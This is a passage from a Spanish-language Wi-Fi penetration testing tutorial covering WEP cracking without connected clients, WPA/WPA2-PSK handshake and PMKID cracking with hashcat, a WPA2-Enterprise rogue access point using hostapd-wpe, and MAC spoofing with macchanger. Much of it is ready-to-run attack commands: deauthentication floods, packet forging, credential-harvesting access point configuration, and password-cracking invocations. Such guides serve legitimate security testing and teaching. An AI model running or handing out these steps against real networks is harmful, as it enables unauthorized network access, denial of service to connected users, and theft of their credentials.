  • Captura de proceso de autenticación y averiguación de contraseña (Sin clientes conectados)
Dado que toda la base del proceso de ataque sobre este tipo de redes se basa en la obtención de vectores de inicialización propagados en las tramas de gestión, el primer paso consiste en monitorizar y capturar todos los datos que se transmitan en la red de tipo WEP y redirigirlos a un fichero.

En este caso el escenario se complica debido a que al no haber clientes conectados no se genera ningún vector de inicialización, pero podemos volver a utilizar la técnica de "fakeauth" para generar una autenticación falsa y proseguir con nuestro ataque.

El primer paso consiste en realizar una monitorización del Punto de Acceso que nos interesa y capturar todo el tráfico en un fichero
 
$ airodump-ng –c 11 --bssid AA:BB:CC:DD:EE:FF -w fichero_captura

Para poder conseguir capturar estos vectores de inicialización de manera más rápida se procede a inyectar ciertas tramas de gestión que fuerzan al Punto de Acceso a generar estos vectores. Como os podéis imaginar, para realizar este proceso necesitaremos que nuestra tarjeta de red disponga de capacidades de inyección de paquetes.

Para empezar generamos tramas de autenticación falsas. Para ello necesitamos conocer los siguientes datos:
  • Dirección MAC del Punto de Acceso o BSSID (operador -a)
  • Dirección MAC del cliente, como no hay ningún cliente, indicaremos la
  • dirección MAC de nuestra tarjeta de red (operador -h)
Abrimos una nueva ventana del terminal y utilizaremos aireplay con el tipo de ataque "fakeauth" que se corresponde con el tipo de ataque -1, el comando resultante sería similar al siguiente:
 
$ aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0

Una vez se están produciendo los ataques de tipo fake-auth, necesitamos poder realizar un ataque de tipo arpreplay (como hacíamos en la opción con clientes) el problema en este caso es que al no haber clientes legítimos no podremos capturar un paquete ARP legítimo para modificarlo y hacer el replay. De modo que necesitamos realizar un ataque de tipo "fragmentation attack" indicando el tipo de ataque -5 - en este caso el BSSID se ha de indicar con el parámetro -b.

Abrimos otro terminal para lanzar el ataque de fragmentación indicando el BSSID y la MAC de nuestra tarjeta inalámbrica.
 
$ aireplay-ng -5 0 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0

El comando anterior nos dará como resultado un fichero de tipo “fragment-xxxx-xxxxxx.xor” que utilizaremos para generar el paquete ARP la generación de este paquete ARP fraudulento se realiza con el comando packetforge-ng y el fichero .xor obtenido del paso anterior e indicaremos que nos guarde el paquete ARP en un fichero llamado "arp-packet".
 
$ packetforge-ng -0 AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w arp-packet

Una vez que hemos generado el paquete, abriremos otra ventana de terminal y utilizaremos de nuevo aireplay-ng para reenviar el paquete ARP generado mediante el ataque "interactive", mediante el argumento -2, que realiza un envío interactivo de los paquetes ARP generados indicando el fichero ARP con el argumento -r.
 
$ aireplay-ng wlan0 -2 -r arp-packet

Una vez que se está forzando la generación de estos vectores de inicialización mediante la falsificación de tramas de gestión podemos abrir otro terminal para para utilizar aircrack-ng para que realice el proceso de averiguación de la contraseña en base a los vectores de inicialización capturados.
 
$ aircrack-ng fichero_captura.cap

Ataques a redes tipo WPA/WPA2-PSK.
Las redes de tipo WPA/WPA2 surgieron para eliminar las debilidades del estándar WEP. Sin embargo, a lo largo de los años se han ido descubriendo técnicas que permiten llegar a averiguar la contraseña de acceso a las redes de tipo WPA/WPA2-PSK.

Usos
Normalmente este tipo de redes se utilizan para dotar de conectividad en redes poco extensas, o en redes de invitados en las que se desea establecer cifrado del canal.

También se utilizan para dotar de conectividad a ciertos dispositivos confiables dentro del segmento (Impresoras, Proyectores, Dispositivos Móviles, Dispositivos VoIP inalámbricos, Hardware específico en IoT…).

En ocasiones también puede encontrarse implementado en pequeños hotspots para dotar de acceso a la red a un determinado grupo de usuarios (VIPS, Administradores,…) o en emplazamientos de difícil conectividad (Salas de Reuniones, Fábricas, Garitas)

Problemas Asociados
Todos los usuarios disponen de la misma contraseña de acceso al medio, usuarios temporales conocerían la contraseña, antiguos empleados, etc.

Por si solas no implementan autenticación o distinción por usuarios.

En ocasiones son utilizadas para proveer de conectividad inalámbrica a redes críticas o corporativas.

Aunque el proceso de cracking del algoritmo es muy lento, el establecimiento de una contraseña que no cumpla con una política de generación de contraseñas robusta puede dar lugar a la obtención de la contraseña en claro.

Tipos de ataque
Existen distintos ataques a los que están expuestas las redes tipo WPA/WPA2-PSK. El ataque es válido para ambas versiones del protocolo WPA1 y WPA2. El ataque más común consiste en capturar el intento de autenticación de un cliente legítimo de la red (4-way-handsake) para tratar de obtener la clave de acceso a la red mediante un proceso posterior de cracking del 4-way-handshake.

Este tipo de ataque se puede realizar con clientes conectados a la red, o sin ningún cliente. A continuación se detallan ambos procesos:
  • Averiguar contraseña WPA/WPA2-PSK con clientes conectados (cracking 4-way-handshake)
El proceso para poder averiguar la contraseña de acceso consiste en capturar handshake de autenticación de los clientes legítimos a la red (4-way-handshake). En condiciones normales se pueden capturar este tipo de handshake en menos de 10-15 minutos de monitorización (dependiendo de la actividad de la red). También existe un método para forzar la deautenticación y autenticación de los dispositivos cliente.

El primer paso consiste en fijar nuestra monitorización sobre la red, canal y punto de acceso adecuado para guardar una captura de todo el tráfico monitorizado.
 
$ airodump-ng wlan0 –c 11 --essid 'nombre_red' –bssid AA:BB:CC:DD:EE:FF -w fichero-captura

En el caso en el que pase un tiempo prudencial y no se haya capturado ningún intento de autenticación mediante el 4-way-handshake es posible forzar la deautenticación de clientes conectados mediante aireplay-ng y el tipo de ataque "deauth" que se especifica con el tipo de ataque -0
 
$ aireplay-ng -0 0 wlan0 -e 'nombre_red' --ignore-negative-one -a AA:BB:CC:DD:EE:FF

También se puede forzar la deautenticación de un único cliente conectado indicando su dirección MAC con el argumento -c. En el momento en el que se captura el 4-way-handshake airodump muestra un mensaje de alerta
 
$ aireplay-ng -0 0 wlan0 -e 'nombre_red' --ignore-negative-one -a AA:BB:CC:DD:EE:FF-c 00:11:22:33:44:55

Comprobar que se ha recogido el 4-way-handshake de manera correcta abriendo el fichero de captura con aircrack-ng.
 
$ aircrack-ng fichero-captura

Si el handshake se capturó correctamente se puede realizar el proceso de cracking del handshake con aircrack-ng, sólo acepta realizar el proceso de cracking mediante diccionarios de posibles contraseñas.
 
$ aircrack-ng –b AA:BB:CC:DD:EE:FF –w diccionario-contraseñas.txt fichero-captura.cap

Dado que existen herramientas más eficientes para realizar el proceso de cracking se puede exportar los datos del 4-way-handshake en otro formato para utilizar otra herramienta de cracking. A continuación se muestra el proceso de exportación y posterior cracking del 4-way-handshake con la herramienta hashcat, tanto mediante una máscara de contraseñas cómo mediante el uso de un diccionario.
 
$ aircrack-ng fichero-captura.cap –j handshake.hccapx
$ hashcat -m 2500 -a3 handshake.hccapx -1 "_-.$?!" -2 ?l?u?d?1 ?u?l?l?l?l?l?2?2?2?2?2?2 --potfile-path=fichero.pot
$ hashcat -m 2500 –a0 handshake.hccapx diccionario_passwords.txt –r fichero_reglas_transposicion --potfile-path=fichero.pot
  • Averiguar contraseña WPA/WPA2-PSK sin clientes conectados (cracking PMKID)
El proceso consiste en extraer el RSN IE (Robust Security Network Information Element) de un sólo frame EAPOL. El RSN IE es un campo opcional que contiene el PMKID, el cual se genera por el propio router cuando un usuario intenta autenticarse.

Al igual que en la técnica anterior, es necesario fijar nuestra monitorización sobre la red, canal y punto de acceso adecuado para guardar una captura de todo el tráfico monitorizado.
 
$ airodump-ng wlan0 –c 11 --essid 'nombre_red' –bssid AA:BB:CC:DD:EE:FF -w fichero-captura

Una vez se ha capturado el PMKID airodump muestra un mensaje de alerta. En este caso la única opción es realizar el proceso de cracking del PMKID capturado con hashcat para ello es necesario exportar el PMKID con aircrack-ng
 
$ aircrack-ng fichero-captura.cap –j pmkid.hccapx

A continuación se muestra El proceso de cracking de PMKID mediante un enfoque de tipo máscara y de diccionario de posibles contraseñas, para realizar este proceso, es necesario disponer de una versión de hashcat 4.20 o superior.
 
$ hashcat -m 16800 -a3 pmkid.hccapx -1 "_-.$?!" -2 ?l?u?d?1 ?u?l?l?l?l?l?2?2?2?2?2?2 --potfile-path=fichero.pot
 $ hashcat -m 16800 –a0 pmkid.hccapx diccionario_passwords.txt –r fichero_reglas_transposicion --potfile-path=fichero.pot

Ataques a redes tipo WPA/WPA2-Enterprise.
Además de las redes de tipo WPA/WPA2-PSK, en las que todos los usuarios comparten una misma
contraseña de acceso a la red, existe la versión WPA/WPA2-Enterprise.

De manera opuesta a WPA/WPA2-PSK, en este tipo de redes cada usuario tiene unas credenciales de acceso distintas a los demás usuarios de la red, de esta manera, se puede habilitar o denegar el acceso a la red a cada usuario de manera individual. Este proceso de autenticación se apoya en un servidor de tipo RADIUS para verificar la identidad del dispositivo cliente. Esta redes pueden utilizar dos tipos de autenticación distinta para que los usuarios se registren en la red:
  • Autenticación basada en credenciales de usuario (usuario/contraseña)
  • Autenticación basada en certificados de cliente
Además, la tecnología WPA/WPA2-Enterprise permite identificar los Puntos de Acceso de la red en base a certificados SSL (similar a la comprobación que se realiza cuando se visita una página web mediante HTTPS), sin embargo, para que esta medida sea. efectiva los dispositivos clientes de la red han de disponer como "Entidad Certificadora Confiable" la CA con la que se generaron los certificados de los Puntos de Acceso (En caso contrario no pueden verificar que los certificados del Puntos de Acceso han sido emitidos por una entidad en la que confían).

El problema en este caso radica en la distribución de esa CA a los dispositivos cliente ya que habrá que desplegarlas de manera transparente al usuario. En este sentido se pueden utilizar dos aproximaciones distintas:
  • Mediante GPO en dispositivos cliente que pertenezcan a un dominio de Active Directory
  • Mediante el uso de sistemas MDM que pueden gestionar de manera remota otros Sistemas Operativos como Linux, macOS, Android e iOS.
Usos
Normalmente este tipo de redes se utilizan para dotar de conectividad en redes corporativas en las que se desea establecer cifrado del canal y un control de acceso individual por usuario. Además permiten
la trazabilidad de las acciones realizadas.

Problemas Asociados
El acceso a este tipo de redes Wi-Fi normalmente proporciona acceso a la red corporativa de manera directa.
No todos los dispositivos inalámbricos disponen soporte para utilizar este tipo de tecnología Wi-Fi.
La distribución de las CA se ha de realizar mediante otros sistemas adicionales como GPO o MDM.
En caso de no distribuir la CA a los dispositivos clientes de la red, éstos no pueden validar si un Punto de Acceso es legítimo o no, lo que permite la realizar técnicas de "Punto de Acceso falso".
Si la autenticación de los dispositivos cliente se realiza mediante credenciales (usuario/contraseña) y no se valida el certificado del punto de acceso, se pueden realizar técnicas de "Punto de Acceso falso" para capturar los intentos de autenticación y realizar un proceso de cracking para obtener las credenciales con las que se autentica un dispositivo.

Ataque
Existe un ataque efectivo en este tipo de redes mediante el cual podemos establecer un "Punto de Acceso falso" en la red para capturar intentos de autenticación basados en credenciales (usuario/contraseña) y realizar un proceso de cracking sobre la autenticación para obtener la contraseña del usuario. Sin embargo, este ataque no es posible en todos los casos, para que este ataque resulte efectivo se han de cumplir las siguientes premisas:
  • Este tipo de ataque sólo funciona en el caso de redes WPA2 Enterprise que utilicen autenticación basada en credenciales usuario:contraseña. En caso de utilizar autenticación mediante certificados de cliente este ataque no resulta efectivo.
  • Otro requisito es que el cliente no debe tener implementada la validación del certificado del Punto de Acceso (Necesitaría tener desplegada la CA Interna en los clientes).
Detalles del ataque
Implementar un punto de acceso falso que se anuncia como un punto de acceso legítimo para la red SSID a suplantar. Este punto de acceso falso se comunica con un servidor RADIUS simulando una interconexión con Active Directory administrado por el atacante.

En caso en que la CA no se encuentre desplegada en los dispositivos legítimos de la red, no pueden comprobar si el Punto de Acceso implementado es legítimo o fraudulento y harán un intento de autenticación.

De esta forma, los clientes legítimos que se encuentren en el radio de cobertura del Punto de acceso falso, enviarán sus credenciales de forma transparente a la plataforma del atacante.

Implementación
Para poder realizar este tipo de ataque, es necesario que nuestra tarjeta de red soporte ponerla en modo Master, en caso contrario no se podrá configurar el Punto de Acceso falso.

También es necesario instalar el entorno de AP falso + Radius se utiliza una versión modificada de hostapd llamada hostapd-wpe. En caso de no estar instalado por defecto se puede instalar cómodamente con el gestor de paquetes apt.
 
$ apt-get install hostapd-wpe

Recordad que se ha de parar el servicio NetworkManager para que no capturen la interfaz de red que queremos utilizar para generar el punto de acceso falso.
 
$ systemctl stop NetworkManager

Comprobar el fichero de configuración de hostapd (normalmente se encuentra en /etc/hostapd-wpe/hostapd-wpe.conf aunque dependiendo de la instalación puede variar) modificando el modo, canal y el nombre de la red del punto e acceso falso según corresponda. A continuación se muestra un ejemplo del contenido del fichero de configuración (Tener en cuenta que dependiendo de la banda y el canal
que queramos sólo debemos indicar un modo, a ó g).
 
$ vim /etc/hostapd-wpe/hostapd-wpe.conf
 
        interface=wlan0 #Interfaz en la que se levantará el Punto de Acceso
        ssid=[ssid_de_la_red] #Nombre de la red
        channel=[1-14] [36-136] #Elegir el canal en el que se implementará el Punto de Acceso fraudulento
        mode=g #(Para la banda de los 2,4 GHz)
        mode=a #(Para la banda de los 5 GHz)

Una vez se ha configurado el Punto de Acceso hay que iniciar hostapd-wpe para que comience a operar el punto de acceso falso.
 
$ hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

A continuación se muestra la ejecución de hostapd-wpe y la captura de un intento de autenticación. Nos prepara el intento de autenticación en formato hashcat para poder realizar un proceso de cracking y revertir la contraseña.

Realizar el proceso de cracking de contraseñas con hashcat, podemos utilizar un enfoque basado en diccionario o un enfoque basado en máscaras.
 
$ hashcat -m 5500 -a 0 hashes-capturadass.txt /usr/share/wordlists/rockyou.txt --session prueba1 --potfile-path passwords.pot
$ hashcat -m 5500 hashes-capturadas.txt -a3 -1 ?u?l?d ?1?1?1?1?1?1?1?1?1?1 -i --increment-min=8 --increment-max=10 --session prueba1 --potfile-path passwords.pot

Ataques al control de accesos
Una de las medidas de "seguridad" es controlar qué dispositivos puede acceder a la red y cuáles no. A nivel doméstico esto se hace utilizando un sistema de listas blancas y listas negras de direcciones MAC. A priori puede parecer una buena idea, porque el atacante no tendrá un dispositivo con esa MAC y, además, no tendrá acceso a la lista. Sin embargo, como se ha visto anteriormente, nada le impide capturar el tráfico y ver qué MAC de cliente está conectada a un AP, con lo que podrá identificar las MAC autorizadas. La suplantación de la MAC de una interfaz de red es trivial, en Linux es tan sencillo como utilizar un comando para ejecutar la aplicación macchanger. En las redes empresariales es más complicado saltarse esta autenticación, puesto que se utilizan servidores para comprobar el cliente.

Instalar Macchanger en Linux
Macchanger es una utilidad que esta disponible en casi todas las distribuciones de Linux por lo que su disponibilidad no representa problema alguno.

Para poder instalarlo basta con buscar Macchanger con nuestro gestor de software preferido.

Para instalar Macchanger en Debian, Ubuntu y derivados de estos basta con teclear el siguiente comando:
 
$ sudo apt-get install macchanger macchanger-gtk

Utilizar Macchanger en Linux
Para comenzar a utilizar esta aplicación en nuestro sistema lo primero que debemos de hacer después de haberla instalado es identificar y conocer nuestra dirección MAC, para ello debemos abrir una terminal y ejecutar el siguiente comando:
 
$ ifconfig

Y nos desplegará un listado de información donde podremos ver nuestra dirección MAC en ella que estará delante de HWaddr.

O también con este comando:
 
$ ip link show wlan0

Y la dirección aparece delante de link/ether xx:xx:xx…

Para poder cambiar la direccion MAC de nuestro equipo desde la terminal basta con ejecutar alguno de los siguientes comandos acorde a lo que necesitamos.

Primero necesitamos desactivar nuestra intefaz de red para ello ejecutamos:
 
$ sudo ifconfig wlan0 down

Tambien lo puedes hacer con:
 
$ ip link set dev wlan0 down

Hecho esto ahora si podemos proceder a utilizar la aplicación. Para el caso de crear una dirección completamente MAC completamente aleatoria, basta con ejecutar:
 
$ macchanger -r wlan0

Para aleatorizar solo los bytes específicos del dispositivo de la dirección MAC actual (es decir, si la dirección MAC estuviera marcada, aún se registraría como del mismo proveedor), ejecutan el comando:
 
$ macchanger -e wlan0

Para cambiar la dirección MAC a un valor específico basta con teclear:
 
$ macchanger --mac=XX:XX:XX:XX:XX wlan0

Cambiamos XX:XX:XX:XX:XX:XX por la MAC al que deseas cambiar.

Finalmente, para devolver la dirección MAC a su valor de hardware original y permanente:
 
$ macchanger -p wlan0

Y volvemos a habilitar nuestra interfaz de red con:
 
$ ifconfig wlan0 up

O también con:
 
$ ip link set dev wlan0 up

***Donde wlan0 es mi interfaz de red, esta puede variar un poco como wlanX, ethX, enpXX entre otras.

En el siguiente enlace podéis obtener más información sobre pentesting wifi (https://book.hacktricks.wiki/es/generic-methodologies-and-resources/pentesting-wifi/index.html).